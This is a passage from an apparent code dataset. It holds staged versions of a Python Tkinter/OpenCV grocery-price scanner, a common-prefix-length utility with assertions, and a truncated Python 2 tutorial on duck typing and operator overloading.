div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-3": "<mask token>\ncontrol = Control()\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\nwidth, height = 800, 700\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button(text='Start', command=takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\nsetImage = False\nselectedImage = None\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-4": "import cv2\nimport PIL\nfrom PIL import Image, ImageTk\nfrom tkinter import *\nfrom matplotlib import pyplot as pt\nfrom matplotlib.image import imread\nfrom control.control import Control\ncontrol = Control()\n\n\ndef takePicture():\n global setImage\n setImage = True\n\n\ndef addRectangles(locations):\n _, axe = pt.subplots()\n img = imread('hola.jpg')\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\nwidth, height = 800, 700\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button(text='Start', command=takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\nsetImage = False\nselectedImage = None\nroot.geometry('900x600')\nroot.resizable(False, False)\n\n\ndef set_count(products):\n div = {'Harina de Trigo La Nieve': 1700, 'Papitas margarita': 1000,\n 'Lentejas': 1800, 'Shampoo': 13900, 'Tarrito rojo': 13000,\n 'Polvo de bizcocho': 2000}\n div_temp = []\n a = ''\n b = 0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c = products.count(item) * div[item]\n b = b + c\n print(item)\n a = a + item + ' ' + str(products.count(item)) + ' ' + str(c\n ) + ' \\n'\n textEditor.insert('1.0', '')\n a = a + ' \\n\\n\\n Toral:' + str(b) + '\\n\\n'\n textEditor.insert('1.0', a)\n\n\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig = cv2image\n img = PIL.Image.fromarray(cv2image)\n img = img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage = frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res = control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage = cv2.imread('result.png')\n selectedImage = PIL.Image.fromarray(selectedImage)\n selectedImage = selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage = imgtk\n B['state'] = NORMAL\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n\nshow_frame()\nroot.mainloop()\n", "step-5": "#Main thread for starting the gui\n\nimport cv2\nimport PIL\nfrom PIL import Image,ImageTk\nfrom tkinter import *\n\nfrom matplotlib import pyplot as pt\nfrom matplotlib.image import imread\nfrom control.control import Control\ncontrol=Control()\n\n#gives the indtruction for saving the current frame\ndef takePicture():\n global setImage\n setImage=True\n\n#add the rectangles to the image where the IA found a products\n#**ARGS: List with the triangles\ndef addRectangles (locations):\n _, axe = pt.subplots()\n img=imread(\"hola.jpg\")\n cv2image = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n axe.imshow(cv2image)\n alto, ancho, _ = img.shape\n\n for item in locations:\n axe.add_patch(item)\n pt.savefig('result.png')\n\n\n#window metric\nwidth, height = 800, 700\n\n#we use open cv to take the frames\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n#UI elementes\nroot = Tk()\nroot.bind('<Escape>', lambda e: root.quit())\nlmain = Label(root)\nlmain.pack()\nlProccessedData = Label(root)\nlProccessedData.pack()\nB = Button( text =\"Start\", command = takePicture)\nB.pack()\ntextEditor = Text(root, width=43, height=5)\ntextEditor.pack()\ntextEditor.place(x=400, y=400)\n\n#Initial wigets state\nsetImage=False\nselectedImage=None\nroot.geometry(\"900x600\")\nroot.resizable(False, False)\n\n#set the total price\n#**ARGS: List with all the products found\ndef set_count(products):\n div={\"Harina de Trigo La Nieve\":1700,\"Papitas margarita\":1000,\"Lentejas\":1800,\"Shampoo\":13900,\"Tarrito rojo\":13000,\"Polvo de bizcocho\":2000}\n div_temp=[]\n a=\"\"\n b=0\n print(products)\n for item in products:\n if item in div_temp:\n continue\n div_temp.append(item)\n c=products.count(item)*div[item]\n b=b+c\n print (item)\n a=a+item+ \" \"+str(products.count(item))+ \" \" +str(c)+\" \\n\"\n textEditor.insert('1.0', \"\")\n\n a=a+\" \\n\\n\\n Toral:\"+str(b)+\"\\n\\n\"\n\n textEditor.insert('1.0', a)\n\n#show the frame captured by the camera\ndef show_frame():\n global setImage\n global selectedImage\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n orig=cv2image\n img = PIL.Image.fromarray(cv2image)\n img=img.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n if setImage:\n selectedImage=frame\n setImage = False\n cv2.imwrite('hola.jpg', selectedImage)\n res=control.get_results('hola.jpg')\n addRectangles(res[0])\n set_count(res[1])\n selectedImage=cv2.imread('result.png')\n selectedImage=PIL.Image.fromarray(selectedImage)\n selectedImage=selectedImage.resize((400, 300))\n imgtk = ImageTk.PhotoImage(image=selectedImage)\n selectedImage=imgtk\n B[\"state\"] = NORMAL\n\n lmain.after(10, show_frame)\n lmain.place(x=10, y=40)\n B.place(x=10, y=500)\n lProccessedData.place(x=470, y=40)\n lProccessedData.configure(image=selectedImage)\n\n#Start UI\nshow_frame()\nroot.mainloop()\n\n\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
__all__ = ''' calc_common_prefix_length '''.split() import operator import itertools def calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None): if __eq__ is None: __eq__ = operator.__eq__ idx = -1 for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)): if not __eq__(a, b): return idx else: return idx+1 assert calc_common_prefix_length([], []) == 0 assert calc_common_prefix_length([], [1]) == 0 assert calc_common_prefix_length([1], [1]) == 1 assert calc_common_prefix_length([1,3], [1,2]) == 1
normal
{ "blob_id": "2b73c4e07bba7ed5c89a31ebd45655eaa85dcdcc", "index": 2689, "step-1": "<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-3": "__all__ = \"\"\"\n calc_common_prefix_length\n \"\"\".split()\n<mask token>\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-4": "__all__ = \"\"\"\n calc_common_prefix_length\n \"\"\".split()\nimport operator\nimport itertools\n\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx + 1\n\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1, 3], [1, 2]) == 1\n", "step-5": "\n__all__ = '''\n calc_common_prefix_length\n '''.split()\nimport operator\nimport itertools\n\ndef calc_common_prefix_length(lhs_iterable, rhs_iterable, /, *, __eq__=None):\n if __eq__ is None:\n __eq__ = operator.__eq__\n\n idx = -1\n for a, b, idx in zip(lhs_iterable, rhs_iterable, itertools.count(0)):\n if not __eq__(a, b):\n return idx\n else:\n return idx+1\n\nassert calc_common_prefix_length([], []) == 0\nassert calc_common_prefix_length([], [1]) == 0\nassert calc_common_prefix_length([1], [1]) == 1\nassert calc_common_prefix_length([1,3], [1,2]) == 1\n\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
########################################################################## # # Draw a 2-D plot for student registration number and the marks secured using gnuplot # ########################################################################## import Gnuplot # create lists to store student marks and regno student_reg=[] student_marks=[] # get the register numbers and marks of the students n = int(input("Enter number of students: ")) for i in range(0,n): reg = int(input("Enter RegNo: ")) student_reg.append(reg) marks=int(input("Enter marks: ")) student_marks.append(marks) # plot students regno. and students marks gplt = Gnuplot.Gnuplot(persist=1) gplt.title("RegNo. V/S Marks") gplt.xlabel("Student RegNo--->") gplt.ylabel("Student Marks--->") d=Gnuplot.Data(student_reg,student_marks,with_="line") gplt.plot(d)
normal
{ "blob_id": "dcbbc7098410d771a7151af7c43ac4d0e4d46f18", "index": 9135, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\n<mask token>\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\n<mask token>\ngplt.plot(d)\n", "step-3": "<mask token>\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n", "step-4": "import Gnuplot\nstudent_reg = []\nstudent_marks = []\nn = int(input('Enter number of students: '))\nfor i in range(0, n):\n reg = int(input('Enter RegNo: '))\n student_reg.append(reg)\n marks = int(input('Enter marks: '))\n student_marks.append(marks)\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title('RegNo. V/S Marks')\ngplt.xlabel('Student RegNo--->')\ngplt.ylabel('Student Marks--->')\nd = Gnuplot.Data(student_reg, student_marks, with_='line')\ngplt.plot(d)\n", "step-5": "##########################################################################\n#\n# Draw a 2-D plot for student registration number and the marks secured using gnuplot \n#\n##########################################################################\n\n\nimport Gnuplot\n\n# create lists to store student marks and regno\nstudent_reg=[]\nstudent_marks=[]\n\n\n# get the register numbers and marks of the students\nn = int(input(\"Enter number of students: \"))\nfor i in range(0,n):\n\treg = int(input(\"Enter RegNo: \"))\n\tstudent_reg.append(reg)\n\tmarks=int(input(\"Enter marks: \"))\n\tstudent_marks.append(marks)\n\n# plot students regno. and students marks\ngplt = Gnuplot.Gnuplot(persist=1)\ngplt.title(\"RegNo. V/S Marks\")\ngplt.xlabel(\"Student RegNo--->\")\ngplt.ylabel(\"Student Marks--->\")\nd=Gnuplot.Data(student_reg,student_marks,with_=\"line\")\n\ngplt.plot(d)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import sys import os import json from collections import OrderedDict from config import folder, portfolio_value from datetime import datetime import logging # Logger setup logger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO) def valid_date(datestring): """ Determine if something is a valid date """ try: datetime.strptime(datestring, '%Y-%m-%d') return True except ValueError as e: logger.info('not a valid date: ' + e) return False def portfolio_value_on_date(date): """ Retrieve the total portfolio value on a given data """ if valid_date(date): try: with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file: data = json.loads(read_file.read(), object_pairs_hook=OrderedDict) return data[date]['daily_value'] except Exception: logger.critical('couldnt read portfolio.json') return 'something went horribly wrong trying to open the portfolio.json' else: return 'error on date format or date not in range' def net_gain_loss_percentage(): """ Retrieve the net gain percentage in total value of portfolio at the end of the backtest """ try: with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file: data = json.loads(read_file.read(), object_pairs_hook=OrderedDict) net_gain_loss = data['final_portfolio'] / portfolio_value logger.info('net gain loss is ' + net_gain_loss) if net_gain_loss > 0: return 'Your net gain is ' + str(net_gain_loss) + '%' elif net_gain_loss == 0: return 'You broke even' else: return 'Your net loss is ' + str(net_gain_loss) + '%' except Exception: logger.critical('couldnt read portfolio.json') return 'something went horribly wrong trying to open the portfolio.json' def max_drawdown(): """ Maximum percentage drawdown experienced in the backtest """ try: with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file: data = json.loads(read_file.read(), object_pairs_hook=OrderedDict) def daily_price(): """ Record daily volume in a generator """ for item in data: if valid_date(item): yield data[item]['daily_value'] # since the daily portfolio is already a running tally # we just need to find the max and the min between them max_price = max(daily_price()) min_price = min(daily_price()) draw = max_price / min_price logger.info('draw percent: ' + draw) return 'Max Drawdown is ' + str(draw) + '%' except Exception: logger.critical('couldnt read portfolio.json') return 'something went horribly wrong trying to open the portfolio.json'
normal
{ "blob_id": "0bc72a558b9bd3b5f74ce5dfce586dd66c579710", "index": 5776, "step-1": "<mask token>\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-3": "<mask token>\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-4": "import sys\nimport os\nimport json\nfrom collections import OrderedDict\nfrom config import folder, portfolio_value\nfrom datetime import datetime\nimport logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=\n OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json'\n )\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8'\n ) as read_file:\n data = json.loads(read_file.read(), object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return (\n 'something went horribly wrong trying to open the portfolio.json')\n", "step-5": "import sys\nimport os\nimport json\nfrom collections import OrderedDict\nfrom config import folder, portfolio_value\nfrom datetime import datetime\nimport logging\n# Logger setup\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef valid_date(datestring):\n \"\"\" Determine if something is a valid date \"\"\"\n try:\n datetime.strptime(datestring, '%Y-%m-%d')\n return True\n except ValueError as e:\n logger.info('not a valid date: ' + e)\n return False\n\n\ndef portfolio_value_on_date(date):\n \"\"\" Retrieve the total portfolio value on a given data \"\"\"\n if valid_date(date):\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n return data[date]['daily_value']\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n else:\n return 'error on date format or date not in range'\n\n\ndef net_gain_loss_percentage():\n \"\"\" Retrieve the net gain percentage in total value of portfolio at the end of the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n net_gain_loss = data['final_portfolio'] / portfolio_value\n logger.info('net gain loss is ' + net_gain_loss)\n if net_gain_loss > 0:\n return 'Your net gain is ' + str(net_gain_loss) + '%'\n elif net_gain_loss == 0:\n return 'You broke even'\n else:\n return 'Your net loss is ' + str(net_gain_loss) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n\n\ndef max_drawdown():\n \"\"\" Maximum percentage drawdown experienced in the backtest \"\"\"\n try:\n with open(folder + 'portfolio_balance.json', encoding='utf-8') as read_file:\n data = json.loads(read_file.read(),\n object_pairs_hook=OrderedDict)\n\n def daily_price():\n \"\"\" Record daily volume in a generator \"\"\"\n for item in data:\n if valid_date(item):\n yield data[item]['daily_value']\n\n # since the daily portfolio is already a running tally\n # we just need to find the max and the min between them\n max_price = max(daily_price())\n min_price = min(daily_price())\n draw = max_price / min_price\n logger.info('draw percent: ' + draw)\n return 'Max Drawdown is ' + str(draw) + '%'\n except Exception:\n logger.critical('couldnt read portfolio.json')\n return 'something went horribly wrong trying to open the portfolio.json'\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
""" Duck typing Ref: http://www.voidspace.org.uk/python/articles/duck_typing.shtml """ ########## # mathmatic operator (syntactic sugar) print 3 + 3 # same as >>> print int.__add__(3, 3) # <<< # overload '+' operator class Klass1(object): def __init__(self, a, b): self.a = a self.b = b def __add__(self, other): return self.a - other.b class Klass2(object): def __init__(self, a, b): self.a = a self.b = b def __add__(self, other): return self.b - other.a obj1 = Klass1(1, 2) obj2 = Klass2(10, 20) print obj1 + obj2 # same as >>> print obj1.__add__(obj2) # <<< ########## # data access for sequence type objects(list, tuple) and mapping type object(dict) # (syntactic sugar) a = [0,1,2] print a[0] # same as >>> print list.__getitem__(a, 0) # <<< b = {'a':0, 'b':1} print b['a'] # same as >>> print dict.__getitem__(b, 'a') # <<< ########## # function call # callable checks where a var has __call__ attr. def f(arg): print arg f(123) # >>> 123 # same as >>> f.__call__(123) # >>> 123 # <<< \ # 'Duck typing' happens because when we do var['member'] Python doesn't care what type object var is. # All it cares is whether the call to its __getitem__ method returns anything sensible. If not - an error will be raised. Something like TypeError: Unsubscriptable object.. # This means you can create your own classes that have their own internal data structures - but are accessed using normal Python 